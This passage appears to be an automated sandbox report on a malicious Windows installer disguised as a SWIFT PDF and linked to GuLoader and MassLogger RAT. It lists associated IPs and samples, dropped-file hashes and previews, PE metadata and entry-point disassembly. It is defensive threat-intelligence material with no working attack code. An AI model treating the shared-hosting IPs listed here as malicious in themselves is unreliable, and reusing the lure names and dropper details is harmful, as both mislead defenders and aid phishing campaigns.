                                                                                                          file.exeGet hashmaliciousScreenConnect Tool, Amadey, LummaC Stealer, PureLog Stealer, Vidar, XmrigBrowse
                                                                                                          • 149.154.167.220
                                                                                                          file.exeGet hashmaliciousScreenConnect Tool, Amadey, LummaC Stealer, Vidar, XWorm, XmrigBrowse
                                                                                                          • 149.154.167.99
                                                                                                          CLOUDFLARENETUSREQUEST FOR QUOATION AND PRICES 0910775_pdf.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                                          • 104.21.67.152
                                                                                                          webhook.exeGet hashmaliciousUnknownBrowse
                                                                                                          • 162.159.138.232
                                                                                                          givenbestupdatedoingformebestthingswithgreatnewsformegive.htaGet hashmaliciousCobalt Strike, RemcosBrowse
                                                                                                          • 104.21.84.67
                                                                                                          clearentirethingwithbestnoticetheeverythinggooodfrome.htaGet hashmaliciousCobalt Strike, RemcosBrowse
                                                                                                          • 172.67.187.200
                                                                                                          https://zde.soundestlink.com/ce/c/675fab7ba82aca38b8d991e6/675fabf585cd17d1e3e2bb78/675fac13057112d43b540576?signature=da009f44f7cd45aeae4fbb5addf15ac91fbf725bb5e9405183f25bf1db8c8baaGet hashmaliciousUnknownBrowse
                                                                                                          • 104.26.10.61
                                                                                                          https://keepsmiling.co.in/front/indexxxx.html?em=NT43NUs6MllJO0ZdVTkzKSA8NzlDOkcgTjhWXU0=Get hashmaliciousUnknownBrowse
                                                                                                          • 104.21.89.91
                                                                                                          file.exeGet hashmaliciousAmadey, Cryptbot, LummaC Stealer, Vidar, XmrigBrowse
                                                                                                          • 104.21.79.7
                                                                                                          http://18.224.21.137/FFmnpShhHMMWeIqsVa2rJ69xinQlZ-7450Get hashmaliciousUnknownBrowse
                                                                                                          • 172.67.41.229
                                                                                                          1.elfGet hashmaliciousUnknownBrowse
                                                                                                          • 1.8.62.108
                                                                                                          file.exeGet hashmaliciousAmadey, LummaC Stealer, Vidar, XmrigBrowse
                                                                                                          • 104.21.79.7
                                                                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                          54328bd36c14bd82ddaa0c04b25ed9adREQUEST FOR QUOATION AND PRICES 0910775_pdf.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                                          • 104.21.67.152
                                                                                                          SWIFT09181-24_pdf.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                                          • 104.21.67.152
                                                                                                          Tvl72VM6PM.exeGet hashmaliciousUnknownBrowse
                                                                                                          • 104.21.67.152
                                                                                                          Tvl72VM6PM.exeGet hashmaliciousUnknownBrowse
                                                                                                          • 104.21.67.152
                                                                                                          Shipment 990847575203.pdf.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                          • 104.21.67.152
                                                                                                          file.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                          • 104.21.67.152
                                                                                                          TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                          • 104.21.67.152
                                                                                                          HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                          • 104.21.67.152
                                                                                                          77541373_BESOZT00_2024_99101234_1_4_1.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                          • 104.21.67.152
                                                                                                          Bloxflip Predictor.exeGet hashmaliciousNjratBrowse
                                                                                                          • 104.21.67.152
                                                                                                          3b5074b1b5d032e5620f69f9f700ff0eREQUEST FOR QUOATION AND PRICES 0910775_pdf.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                                          • 149.154.167.220
                                                                                                          jignesh.exeGet hashmaliciousQuasarBrowse
                                                                                                          • 149.154.167.220
                                                                                                          skibidi.exeGet hashmaliciousQuasarBrowse
                                                                                                          • 149.154.167.220
                                                                                                          vanilla.exeGet hashmaliciousQuasarBrowse
                                                                                                          • 149.154.167.220
                                                                                                          givenbestupdatedoingformebestthingswithgreatnewsformegive.htaGet hashmaliciousCobalt Strike, RemcosBrowse
                                                                                                          • 149.154.167.220
                                                                                                          clearentirethingwithbestnoticetheeverythinggooodfrome.htaGet hashmaliciousCobalt Strike, RemcosBrowse
                                                                                                          • 149.154.167.220
                                                                                                          c2.htaGet hashmaliciousXWormBrowse
                                                                                                          • 149.154.167.220
                                                                                                          file.exeGet hashmaliciousAmadey, LummaC Stealer, Vidar, XmrigBrowse
                                                                                                          • 149.154.167.220
                                                                                                          SWIFT09181-24_pdf.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                                          • 149.154.167.220
                                                                                                          TD2HjoogPx.dllGet hashmaliciousUnknownBrowse
                                                                                                          • 149.154.167.220
                                                                                                          37f463bf4616ecd445d4a1937da06e19REQUEST FOR QUOATION AND PRICES 0910775_pdf.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                                          • 142.250.181.1
                                                                                                          • 172.217.19.174
                                                                                                          file.exeGet hashmaliciousLummaC, Amadey, Cryptbot, Vidar, XmrigBrowse
                                                                                                          • 142.250.181.1
                                                                                                          • 172.217.19.174
                                                                                                          file.exeGet hashmaliciousAmadey, Cryptbot, LummaC Stealer, Vidar, XmrigBrowse
                                                                                                          • 142.250.181.1
                                                                                                          • 172.217.19.174
                                                                                                          c2.htaGet hashmaliciousXWormBrowse
                                                                                                          • 142.250.181.1
                                                                                                          • 172.217.19.174
                                                                                                          lem.exeGet hashmaliciousVidarBrowse
                                                                                                          • 142.250.181.1
                                                                                                          • 172.217.19.174
                                                                                                          Setup.msiGet hashmaliciousVidarBrowse
                                                                                                          • 142.250.181.1
                                                                                                          • 172.217.19.174
                                                                                                          file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, Cryptbot, LummaC Stealer, PureLog Stealer, StealcBrowse
                                                                                                          • 142.250.181.1
                                                                                                          • 172.217.19.174
                                                                                                          file.exeGet hashmaliciousPureCrypter, LummaC, Amadey, Cryptbot, LummaC Stealer, PureLog Stealer, VidarBrowse
                                                                                                          • 142.250.181.1
                                                                                                          • 172.217.19.174
                                                                                                          SWIFT09181-24_pdf.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                                          • 142.250.181.1
                                                                                                          • 172.217.19.174
                                                                                                          file.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, StealcBrowse
                                                                                                          • 142.250.181.1
                                                                                                          • 172.217.19.174
                                                                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                          C:\Users\user\AppData\Local\Temp\nsq69D9.tmp\System.dllREQUEST FOR QUOATION AND PRICES 0910775_pdf.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                                            SWIFT09181-24_pdf.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                                              O0rhQM49FL.exeGet hashmaliciousUnknownBrowse
                                                                                                                O0rhQM49FL.exeGet hashmaliciousGuLoaderBrowse
                                                                                                                  5WP9WCM8qV.exeGet hashmaliciousGuLoaderBrowse
                                                                                                                    5WP9WCM8qV.exeGet hashmaliciousGuLoaderBrowse
                                                                                                                      K8ZvbdkrGx.exeGet hashmaliciousGuLoaderBrowse
                                                                                                                        K8ZvbdkrGx.exeGet hashmaliciousGuLoaderBrowse
                                                                                                                          JOSXXL1.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                                            Certificado FNMT-RCM.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                                              Process:C:\Users\user\Desktop\SWIFT091816-24_pdf.exe
                                                                                                                              File Type:data
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):56144
                                                                                                                              Entropy (8bit):4.602729797668527
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:768:uWHutI/Kh5+BOfOywpKhYE4kirhMZs7fRVPYQagCy8s8ks7b:uhMKh5+BPTMaE4kidMVgTZ8R7b
                                                                                                                              MD5:5E9B639D1BD991718F5616DC844CC948
                                                                                                                              SHA1:10C13FACE71A7D77EBB4F8570AD9AB849C0DE6F4
                                                                                                                              SHA-256:384967853FBF407613B54DD1D10577619EAE2B0905251C0A3445B5CE4E144ED1
                                                                                                                              SHA-512:F3D887ED54F197158478E024CF1180164BB6849481E8EFD7901564308CEDE83B4A6480EA1DBEC71457ABDBF4BB6660A0D892EDA7E2A2E5B61BB560E713739807
                                                                                                                              Malicious:false
                                                                                                                              Reputation:low
                                                                                                                              Preview:......b..........................xx....f.^..................1................Z..............m.......................8....4......`.nn......................[............................mm.......m..kk......BB..cc.4..................Z...................CC......6.................._...............mm..,.......zzz...%...............uu....................@........................................TT........>>>..xxx............................................%%...R........6..O....iii..................X....................@...2.^^....~~........RRR..................&.&.......oooo..$$$.. ........hh............................$.......=....D......P..nn...qqq...].............#................0.d.i.EE..................................111.llll...........z.....q........UUUU..o.....22...WW.i....+....f........ii......c....{{.....((.....YYY..|||............K......................E....T..i......ppppp..ooooo.w.hh...........V........................((..............................................................
                                                                                                                              Process:C:\Users\user\Desktop\SWIFT091816-24_pdf.exe
                                                                                                                              File Type:data
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):56641
                                                                                                                              Entropy (8bit):1.2318917163845036
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:384:vrBeaW6xu5Pd9GW0Zq+/HXF1qcGNMUd8phxiFQHOV7hpvZlq:t9+Pdop/306xixrlq
                                                                                                                              MD5:39C9A5F767D8C170B5CE38EA8D5734D4
                                                                                                                              SHA1:4B4CA81EB3D093645B504004F62A269D4EACDECC
                                                                                                                              SHA-256:87A7017021050071DBE5726BF9AC505763CD923E2BDE93336CA0905802CD8D49
                                                                                                                              SHA-512:AE2D66B801251046FA4D3093391B916955B43BE75A954DD398583B1B8881A9F109F51F81D6E4FE759F83AC7B921FA89B02185013AFDE16D3C8EAB422BE89B4FF
                                                                                                                              Malicious:false
                                                                                                                              Reputation:low
                                                                                                                              Preview:.............l.........z........i........8.........................m.........f.C.Z..............I./........T..1.......................!......................D.................................................................................U................................../........................................-.......................}.........T`.....0@.............................F..............................].........................L.........<.........................................................................................N......................................................x........................................................@............................................4..........'...................?..........I.............../....................L....,...............................................;......k.....................................i............4.......................................K.....7...7....c...................U..#..............................
                                                                                                                              Process:C:\Users\user\Desktop\SWIFT091816-24_pdf.exe
                                                                                                                              File Type:data
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):265012
                                                                                                                              Entropy (8bit):7.779151164586136
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:6144:80CRHkWxHRRqVMr6UYR5gkpO+a5FzNJpYPjx++nZx:3nARqVMr7YR5k+aSPk+v
                                                                                                                              MD5:9CE89B37C74BF9D6F5C859F5328E28E0
                                                                                                                              SHA1:730DF2B270BA090A91BFCA3D44481F9D265BA8D8
                                                                                                                              SHA-256:023EBB51F309BC108E0683918273BA04AD7BC912E28621785AA9A67BA4A73861
                                                                                                                              SHA-512:AA3BBD32F8157E0A576FC106A2E5E5A36B871FDDBB0B25C2C2021DA7CD87ED9956DA10797F972F76F56C36EA5D22E281975DBBB3B3568AE93CF3F7A17E5032B7
                                                                                                                              Malicious:false
                                                                                                                              Reputation:low
                                                                                                                              Preview:.................&........................99........................ ........M.....$$$$.......]..(((................777..........................`...!..................................................6......ss....lll.....j.''..........................\..................>......ii.......'.....,,....................g.....eee.77........CC./.............vvvvvv....6666....v.............````.............;;..............g.......................===.............B.......1111...{{{..kkk.............//...x.......$$...NN.........ssss..............x..............WWWWW...............??????.s.......................lll._....A......ll.........................QQ.................q.!...P...u.........[.c......H...?...........A..__...........F......**.pppp..>>.....tttt....A..D.:.............AAAA...................B......g............7...............<<......g..2222....&&.......................A.......J.......................A...e.......)..@@@@.H....DDD..............##..rrr....K.c.......a.........dddddd.......m
                                                                                                                              Process:C:\Users\user\Desktop\SWIFT091816-24_pdf.exe
                                                                                                                              File Type:ASCII text, with very long lines (345), with no line terminators
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):345
                                                                                                                              Entropy (8bit):4.241929841155785
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:6:dvkdMOL4xnuXGNQWjMIDw1luhPB46xAJX7sBJOdkmLA8gMfArpIXbgOwQWiQJEEC:dufExIoDe1lYnGJLsBQdtL6rpIrWQkJA
                                                                                                                              MD5:AE69FE0F4D1E1115BC470031E661785C
                                                                                                                              SHA1:8D3799826FE457C61C1E8EE5E3071683A8125BC5
                                                                                                                              SHA-256:6B18768503395C809263568D3A8858810404C2B7D49DC7CB6CE5F717F5D6C7DE
                                                                                                                              SHA-512:969C0DB048EAC4A9B447A0C0C463A7983F1B4091B6206E274B9D249F8311439B6C33F5AA1EDF9CD1AA27502DA49378D3E1B45F16909C55DF830E51684E9648BE
                                                                                                                              Malicious:false
                                                                                                                              Reputation:low
                                                                                                                              Preview:pandas omflakkendes tribrachic miskenning.nonvitally subcase syvendelens weighin.tilhreres lysed metencephalons aabentstaaendes arbejdsmarkedsstyrelsers.kodeskrifter indgaaet nstnederst desulphurise badevgtene caliche.reabsorption erhvervskommunernes aktuarerne ammunition whilere sughs.tusindaarigt barkers landholders butylation phrenicocolic.
                                                                                                                              Process:C:\Users\user\Desktop\SWIFT091816-24_pdf.exe
                                                                                                                              File Type:Matlab v4 mat-file (little endian) ', numeric, rows 63, columns 0
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):210366
                                                                                                                              Entropy (8bit):1.240975322465592
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:768:vBTwJOLxCIF0V6iLboHog6BQlsMqlN1R0pmGy30wbfq6+9GmlsNh34k0uJ/QohER:cJigyyDJnLH7zA
                                                                                                                              MD5:AEF78D8D561E8802286A78AAC6C73ED6
                                                                                                                              SHA1:DDF5DA649482D0A553802827BB9F0EF64A7069E1
                                                                                                                              SHA-256:45F24543C01C9A11CC2246A9B27569AF433EEF61C877A4E191B683315D3566BE
                                                                                                                              SHA-512:93D43C0CECADF8E1F507F8E58D2B4D92995D8F7ECF213A23559938B380033A6D0D80B0816A8D6603864F821F4FEDC988E0F79BE14C6892089178970E08DC4199
                                                                                                                              Malicious:false
                                                                                                                              Reputation:low
                                                                                                                              Preview:....?...........*=..'...........................m........................y............................................................................H.......................................c.......x........................................................:...s.......................+.........................................~.....2........C..Z...................................k............................i.........................................{...............................................?%............................................................................Z................................v.............<.....'.............L..........................................+...............................s.........................................W........................`........................[..............&..................T................................j......M......[.....................c.............................................9.......................................
                                                                                                                              Process:C:\Users\user\Desktop\SWIFT091816-24_pdf.exe
                                                                                                                              File Type:data
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):363811
                                                                                                                              Entropy (8bit):1.2512349423386382
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:768:y2f405GRYtnSLOBbyCociR2TVuEpHsVURGxwGmXjyMB+CtKDOgt9rlHF1QOs+9m5:pIuagbnK7CwVwFpYogwhUsvCq
                                                                                                                              MD5:BFEA15C03AB295424981A73637A19491
                                                                                                                              SHA1:A5ADABDDC373D6B3004F96946D84B651E42D9F5C
                                                                                                                              SHA-256:83E9CE74259889DCABD39D41131F286882B224698DCDEB8D0B4074069AAA687B
                                                                                                                              SHA-512:CB5969BFFAED8AF1791938E924E0CC9F876E45165F4E7EA5E9249131FACA831C0600F14BD68EF041D18C81A3FBE087970043D1B3B8A6786C1E5E5049834D4D0D
                                                                                                                              Malicious:false
                                                                                                                              Preview:...................................................E....................................j.A..(.......................................+..........................$.............................................z.L........%......t...................................2l.............1.............................................................................U...g.......................`............................................................0..................................J......................................K...R...............................................................&...c......................................S......!...8..................Y......................................................>u........T...................L........................................................................0.........................................W.....L.n.....................................$.b...........B..................................................8...............!...............
                                                                                                                              Process:C:\Users\user\Desktop\SWIFT091816-24_pdf.exe
                                                                                                                              File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):11776
                                                                                                                              Entropy (8bit):5.655335921632966
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:192:eF24sihno00Wfl97nH6T2enXwWobpWBTU4VtHT7dmN35Ol9Sl:h8QIl975eXqlWBrz7YLOl9
                                                                                                                              MD5:EE260C45E97B62A5E42F17460D406068
                                                                                                                              SHA1:DF35F6300A03C4D3D3BD69752574426296B78695
                                                                                                                              SHA-256:E94A1F7BCD7E0D532B660D0AF468EB3321536C3EFDCA265E61F9EC174B1AEF27
                                                                                                                              SHA-512:A98F350D17C9057F33E5847462A87D59CBF2AAEDA7F6299B0D49BB455E484CE4660C12D2EB8C4A0D21DF523E729222BBD6C820BF25B081BC7478152515B414B3
                                                                                                                              Malicious:false
                                                                                                                              Antivirus:
                                                                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                              Joe Sandbox View:
                                                                                                                              • Filename: REQUEST FOR QUOATION AND PRICES 0910775_pdf.exe, Detection: malicious, Browse
                                                                                                                              • Filename: SWIFT09181-24_pdf.exe, Detection: malicious, Browse
                                                                                                                              • Filename: O0rhQM49FL.exe, Detection: malicious, Browse
                                                                                                                              • Filename: O0rhQM49FL.exe, Detection: malicious, Browse
                                                                                                                              • Filename: 5WP9WCM8qV.exe, Detection: malicious, Browse
                                                                                                                              • Filename: 5WP9WCM8qV.exe, Detection: malicious, Browse
                                                                                                                              • Filename: K8ZvbdkrGx.exe, Detection: malicious, Browse
                                                                                                                              • Filename: K8ZvbdkrGx.exe, Detection: malicious, Browse
                                                                                                                              • Filename: JOSXXL1.exe, Detection: malicious, Browse
                                                                                                                              • Filename: Certificado FNMT-RCM.exe, Detection: malicious, Browse
                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......1...u.u.u...s.u.a....r.!..q....t....t.Richu.........................PE..L...]..V...........!..... ...........'.......0...............................`.......................................2.......0..P............................P.......................................................0..X............................text............ .................. ..`.rdata..S....0.......$..............@..@.data...x....@.......(..............@....reloc..b....P.......*..............@..B................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                              Process:C:\Users\user\Desktop\SWIFT091816-24_pdf.exe
                                                                                                                              File Type:MS Windows shortcut, Item id list present, Has Relative path, Has Working directory, ctime=Sun Dec 31 23:25:52 1600, mtime=Sun Dec 31 23:25:52 1600, atime=Sun Dec 31 23:25:52 1600, length=0, window=hide
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):1156
                                                                                                                              Entropy (8bit):3.250976511083343
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:12:8wl0asXowAOcQ/tz0/CSL6/cBnwgXl341DEDeG41DED/RKQ1olfW+kjcmAahTCN7:8xLDWLrFPjPL9izZMspdqy
                                                                                                                              MD5:DA3120C581FD7369156BF3B9B82815B5
                                                                                                                              SHA1:12B60059AE6BCFFFADEB2D4BDD2B4000E5295362
                                                                                                                              SHA-256:5EA5E2BC538A59AA6F16F46991007F577B6EA4B456D42CBBDCF25EAB84FFA971
                                                                                                                              SHA-512:B65020A6B78960BED204A4F4C39BEE4BD43E28349DB8D61C91788D6600E89204DFFB4D9087434D8A924994C04C8C36F2A3D69563FDA8AE1D34A333F017AC2FD6
                                                                                                                              Malicious:false
                                                                                                                              Preview:L..................F........................................................m....P.O. .:i.....+00.../C:\...................P.1...........Users.<............................................U.s.e.r.s.....P.1...........user.<............................................j.o.n.e.s.....V.1...........AppData.@............................................A.p.p.D.a.t.a.....V.1...........Roaming.@............................................R.o.a.m.i.n.g.....b.1...........mindevrdigt.H............................................m.i.n.d.e.v.r.d.i.g.t.......2...........boghandlermedhjlperens.tor..f............................................b.o.g.h.a.n.d.l.e.r.m.e.d.h.j.l.p.e.r.e.n.s...t.o.r...*.../.....\.....\.....\.m.i.n.d.e.v.r.d.i.g.t.\.b.o.g.h.a.n.d.l.e.r.m.e.d.h.j.l.p.e.r.e.n.s...t.o.r.O.C.:.\.U.s.e.r.s.\.j.o.n.e.s.\.A.p.p.D.a.t.a.\.L.o.c.a.l.\.M.i.c.r.o.s.o.f.t.\.W.i.n.d.o.w.s.\.I.N.e.t.C.a.c.h.e.\.r.a.p.i.d.i.t.e.t.e.n.s.\.f.r.e.m.t.v.i.n.g.............y.............>.e.L.:..er.=y....
                                                                                                                              File type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                                                                                                                              Entropy (8bit):7.958449020228623
                                                                                                                              TrID:
                                                                                                                              • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                                                                              • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                                                              • DOS Executable Generic (2002/1) 0.02%
                                                                                                                              • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                                              File name:SWIFT091816-24_pdf.exe
                                                                                                                              File size:434'942 bytes
                                                                                                                              MD5:397346c3391583257950cfe556f0a5e6
                                                                                                                              SHA1:10db5f36ad73ec9757cc05e04aef346a5e486fd5
                                                                                                                              SHA256:342df796e039d1c4b24525eabc4a9e98ce5ff399a4d9ca92dc10b2b87a84c120
                                                                                                                              SHA512:1761d7e174889423f882fc8ae6c993d9aefd99469f4d4245646cf7bd3bd50ef438c381d40432c973057248ac6eb4434b7f87c1f76bd685323c793aff4ae87ebd
                                                                                                                              SSDEEP:12288:I5A6gahpmuyaqry4+bTuT+P33xOFL6IR8u7Jj1JK8s5FEeKI:ZFYcu6uu4CvR8u7Jj1Jicex
                                                                                                                              TLSH:A59423513330EA72E8A14B354F379BF76A7A731545A05F0F8F64699838223C2CC6F969
                                                                                                                              File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1...P...P...P..*_...P...P..NP..*_...P...s...P...V...P..Rich.P..........................PE..L......V.................d.........
                                                                                                                              Icon Hash:3d2e0f95332b3399
                                                                                                                              Entrypoint:0x4032a0
                                                                                                                              Entrypoint Section:.text
                                                                                                                              Digitally signed:false
                                                                                                                              Imagebase:0x400000
                                                                                                                              Subsystem:windows gui
                                                                                                                              Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
                                                                                                                              DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                                                                                              Time Stamp:0x567F847F [Sun Dec 27 06:26:07 2015 UTC]
                                                                                                                              TLS Callbacks:
                                                                                                                              CLR (.Net) Version:
                                                                                                                              OS Version Major:4
                                                                                                                              OS Version Minor:0
                                                                                                                              File Version Major:4
                                                                                                                              File Version Minor:0
                                                                                                                              Subsystem Version Major:4
                                                                                                                              Subsystem Version Minor:0
                                                                                                                              Import Hash:d4b94e8ee3f620a89d114b9da4b31873
                                                                                                                              Instruction
                                                                                                                              sub esp, 000002D4h
                                                                                                                              push ebp
                                                                                                                              push esi
                                                                                                                              push 00000020h
                                                                                                                              xor ebp, ebp
                                                                                                                              pop esi
                                                                                                                              mov dword ptr [esp+0Ch], ebp
                                                                                                                              push 00008001h
                                                                                                                              mov dword ptr [esp+0Ch], 0040A300h
                                                                                                                              mov dword ptr [esp+18h], ebp
                                                                                                                              call dword ptr [004080B0h]
                                                                                                                              call dword ptr [004080ACh]
                                                                                                                              cmp ax, 00000006h
                                                                                                                              je 00007F64AC8264E3h
                                                                                                                              push ebp
                                                                                                                              call 00007F64AC829626h
                                                                                                                              cmp eax, ebp
                                                                                                                              je 00007F64AC8264D9h
                                                                                                                              push 00000C00h
                                                                                                                              call eax
                                                                                                                              push ebx
                                                                                                                              push edi
                                                                                                                              push 0040A2F4h
                                                                                                                              call 00007F64AC8295A3h
                                                                                                                              push 0040A2ECh
                                                                                                                              call 00007F64AC829599h
                                                                                                                              push 0040A2E0h
                                                                                                                              call 00007F64AC82958Fh
                                                                                                                              push 00000009h
                                                                                                                              call 00007F64AC8295F4h
                                                                                                                              push 00000007h
                                                                                                                              call 00007F64AC8295EDh
                                                                                                                              mov dword ptr [00434F04h], eax
                                                                                                                              call dword ptr [00408044h]
                                                                                                                              push ebp
                                                                                                                              call dword ptr [004082A8h]
                                                                                                                              mov dword ptr [00434FB8h], eax
                                                                                                                              push ebp
                                                                                                                              lea eax, dword ptr [esp+34h]
                                                                                                                              push 000002B4h
                                                                                                                              push eax
                                                                                                                              push ebp
                                                                                                                              push 0042B228h
                                                                                                                              call dword ptr [0040818Ch]
                                                                                                                              push 0040A2C8h
                                                                                                                              push 00433F00h
                                                                                                                              call 00007F64AC8291DAh
                                                                                                                              call dword ptr [004080A8h]
                                                                                                                              mov ebx, 0043F000h
                                                                                                                              push eax
                                                                                                                              push ebx
                                                                                                                              call 00007F64AC8291C8h
                                                                                                                              push ebp
                                                                                                                              call dword ptr [00408178h]
                                                                                                                              Programming Language:
                                                                                                                              • [EXP] VC++ 6.0 SP5 build 8804
                                                                                                                              NameVirtual AddressVirtual Size Is in Section
                                                                                                                              IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                                                              IMAGE_DIRECTORY_ENTRY_IMPORT0x85c80xa0.rdata
                                                                                                                              IMAGE_DIRECTORY_ENTRY_RESOURCE0x5d0000x11e0.rsrc
                                                                                                                              IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                                              IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                                                              IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                                                                                                                              IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                                                                              IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                                              IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                                              IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                                                              IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                                                              IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                                              IMAGE_DIRECTORY_ENTRY_IAT0x80000x2b8.rdata
                                                                                                                              IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                                              IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                                                              IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                                                                                                              NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                                              .text0x10000x637c0x640083ff228d6dae8dd738eb2f78afbc793fFalse0.672421875data6.491609540807675IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                                                              .rdata0x80000x147c0x1600d9f9b0b330e238260616b62a7a3cac09False0.42933238636363635data4.973928345594701IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                              .data0xa0000x2aff80x6003f2b05c8fbb8b2e4c9c89e93d30e7252False0.53125data4.133631086111171IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                              .ndata0x350000x280000x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                              .rsrc0x5d0000x11e00x120020639f4e7c421f5379e2fb9ea4a1530dFalse0.3684895833333333data4.485045860065118IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                              NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                                                              RT_BITMAP0x5d2680x368Device independent bitmap graphic, 96 x 16 x 4, image size 768EnglishUnited States0.23623853211009174
                                                                                                                              RT_ICON0x5d5d00x2e8Device independent bitmap graphic, 32 x 64 x 4, image size 640EnglishUnited States0.42473118279569894
                                                                                                                              RT_DIALOG0x5d8b80x144dataEnglishUnited States0.5216049382716049
                                                                                                                              RT_DIALOG0x5da000x13cdataEnglishUnited States0.5506329113924051
                                                                                                                              RT_DIALOG0x5db400x100dataEnglishUnited States0.5234375
                                                                                                                              RT_DIALOG0x5dc400x11cdataEnglishUnited States0.6056338028169014
                                                                                                                              RT_DIALOG0x5dd600xc4dataEnglishUnited States0.5918367346938775
                                                                                                                              RT_DIALOG0x5de280x60dataEnglishUnited States0.7291666666666666
                                                                                                                              RT_GROUP_ICON0x5de880x14dataEnglishUnited States1.2
                                                                                                                              RT_MANIFEST0x5dea00x33fXML 1.0 document, ASCII text, with very long lines (831), with no line terminatorsEnglishUnited States0.5547533092659447
                                                                                                                              DLLImport
